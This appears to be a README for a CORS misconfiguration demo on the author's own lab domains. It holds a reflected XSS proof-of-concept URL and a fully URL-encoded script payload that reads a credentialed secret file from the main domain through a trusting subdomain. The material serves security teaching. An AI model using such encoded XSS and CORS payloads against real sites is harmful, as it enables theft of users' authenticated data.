/cors-missconfig-Exploitation-Demo

Demo for Exploiting CORS Misconfiguration using XSS

Primary LanguagePHP

cors-misconfig-Exploitation-Demo

The main.domain.com has a secret file secret that allows any sundomain of domain.com to access it.

This can be exploited when an attacker has found xss on any subdomain of domain.com in this case xss.domain.com using which he can exfiltrated the data to his server.

I Have setup this on a free hosting account.

Main domain : cors-demo.rf.gd --> This has cors misconfig.

Subdomain : xss.cors-demo.rf.gd --> This has reflect xss.

POC of reflected xss : http://xss.cors-demo.rf.gd/index.php?uname=Noman<script>alert(document.domain)</script>

POC of extracting data from main domain using xss :


http://xss.cors-demo.rf.gd/index.php?uname=Noman%3c%70%20%69%64%3d%64%65%6d%6f%3e%3c%2f%70%3e%3c%73%63%72%69%70%74%3e%66%75%6e%63%74%69%6f%6e%20%63%6f%72%73%28%29%20%7b%20%20%76%61%72%20%78%68%74%74%70%20%3d%20%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%28%29%3b%20%20%78%68%74%74%70%2e%6f%6e%72%65%61%64%79%73%74%61%74%65%63%68%61%6e%67%65%20%3d%20%66%75%6e%63%74%69%6f%6e%28%29%20%7b%20%20%20%20%20%20%20%20%69%66%20%28%74%68%69%73%2e%72%65%61%64%79%53%74%61%74%65%20%3d%3d%20%34%20%26%26%20%74%68%69%73%2e%73%74%61%74%75%73%20%3d%3d%20%32%30%30%29%20%7b%20%20%20%20%20%20%20%20%61%6c%65%72%74%28%74%68%69%73%2e%72%65%73%70%6f%6e%73%65%54%65%78%74%29%3b%20%20%20%20%20%20%20%20%20%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%64%65%6d%6f%22%29%2e%69%6e%6e%65%72%48%54%4d%4c%20%3d%20%74%68%69%73%2e%72%65%73%70%6f%6e%73%65%54%65%78%74%3b%20%20%20%20%20%20%20%20%7d%20%20%7d%3b%20%20%78%68%74%74%70%2e%6f%70%65%6e%28%22%47%45%54%22%2c%20%22%68%74%74%70%3a%2f%2f%63%6f%72%73%2d%64%65%6d%6f%2e%72%66%2e%67%64%2f%73%65%63%72%65%74%2e%70%68%70%22%2c%20%74%72%75%65%29%3b%20%20%78%68%74%74%70%2e%77%69%74%68%43%72%65%64%65%6e%74%69%61%6c%73%20%3d%20%74%72%75%65%3b%20%20%78%68%74%74%70%2e%73%65%6e%64%28%29%3b%7d%63%6f%72%73%28%29%3b%3c%2f%73%63%72%69%70%74%3e

You can watch the proof of concept : https://youtu.be/CSmrzEVRqKI

and you can read the blogpost on the same : https://bugbaba.blogspot.com/2018/02/exploiting-cors-miss-configuration.html

for any queiries/feedback you can contact me :)